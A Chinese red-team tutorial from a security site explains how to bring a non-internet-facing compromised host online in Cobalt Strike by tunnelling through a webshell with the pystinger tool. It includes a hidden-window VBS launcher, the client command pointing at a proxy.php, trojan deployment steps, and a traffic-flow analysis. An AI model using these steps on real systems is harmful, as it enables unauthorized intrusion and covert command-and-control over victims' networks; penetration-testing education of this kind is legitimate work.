freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

『红蓝对抗』不出网机器如何上线 CS?
KeePass 2021-08-13 09:34:27 291601

介绍: 在渗透测试过程中会出现目标机器不通外网的情况,本文介绍通过pystinger工具实现上线。

0x00 前言

在普通渗透测试过程中,总会遇到一种情况,在该种情况下,系统只是内网服务器做的端口映射,并且该服务器不通外网,这样平常情况无法实现CS上线操作。通过pystinger工具可以实现上线操作。

0x01 使用方法

假设我们在拿下一台目标主机,但是该主机只是做端口映射,无法连接外网。

image

使用pystinger工具进行 CS 上线,下载地址,通过webshell实现内网SOCK4代理,端口映射可以使目标不出网情况下在 CS 上线。

image

首先上传对应版本脚本到目标服务器。

image

stinger_server.exe上传到目标服务器,在目标机上创建stinger_server.vbs文件,示例如下:

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c D:\XXXXX\stinger_server.exe 0.0.0.0",vbhide

image

执行vbs脚本,启动服务。

image

stinger_client上传到teamserver服务器,-w指定proxyurl地址运行。

chmod +x stinger_client
./stinger_client -w http://x.x.x.x/proxy.php -l 0.0.0.0 -p 60000

image

CS新建监听器,设置为目标机器的内网IP,端口默认60020。(teamserver服务器和执行stinger_client应为同一台服务器)

image

生成木马,上传目标服务器并执行。可看到CS有新上线主机。

image

成功访问内网网段。

image

这里我只测试了Windows版本,有兴趣的可以尝试一下Linux版本。

0x02 原理剖析

实验室的一个大佬拍着我的肩膀说,知其然也要知其所以然。所以我开始研究起来它的原理。在成功访问到内网之后,我查看了进程信息以及端口连接信息。经过一个多小时的梳理,我发现存在以下可用端口连接及进程信息。

image

首先梳理一下。

stinger_server.exe  PID  2424
httpd.exe           PID  3784
artifact.exe        PID  3600
httpd.exe.          PID  800

那么在服务器上存在这样一个数据流向,来自192.168.76.1(因为我使用76.1做代理服务器进行的端口映射) 访问proxy.php的流量进入目标主机 80 端口,而后proxy.php基于httpd服务发起新的连接,数据进入PID 3784的进程控制。

在进入PID 3784进程后,本机60793端口对60010端口进行连接,并且60010端口开启监听的是stinger_server.exe。随后数据被其接收。

最后stinger_server.exe使用60020端口与artifact.exe进行交互。至此目标机端数据流向分析完毕。

继而在自己的teamserver服务器上发现以下连接。

image

发现teamserver中上线的主机连接是由stinger_client发起的,这么分析的话,stinger_client是一个桥梁作用,连接teamserver和被控主机。下图39.82.XX.XX:5000即为我测试过程中使用的 IP,该进程由stinger_client发起也就证实了我的猜测。

image

以上分析完之后,所有的流量走向已经搞明白了。

0x03 结束语

果然大佬说的没错,知其然,知其所以然。

路漫漫其修远兮,吾将上下而求索。

作者: Mr-hello

# web安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 KeePass 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
网络实战攻防
KeePass LV.5
宸极实验室,渗透测试/代码审计/红蓝对抗/CTF,base 济南,有问题可关注同名公众号后联系。
  • 36 文章数
  • 179 关注者
『红蓝对抗』内网渗透中 RDP 的那些事儿
2021-09-14
『渗透测试』记一次带防护的靶场渗透(一)
2021-09-08
『CTF』史上最全 RSA 题目总结
2021-09-08
文章目录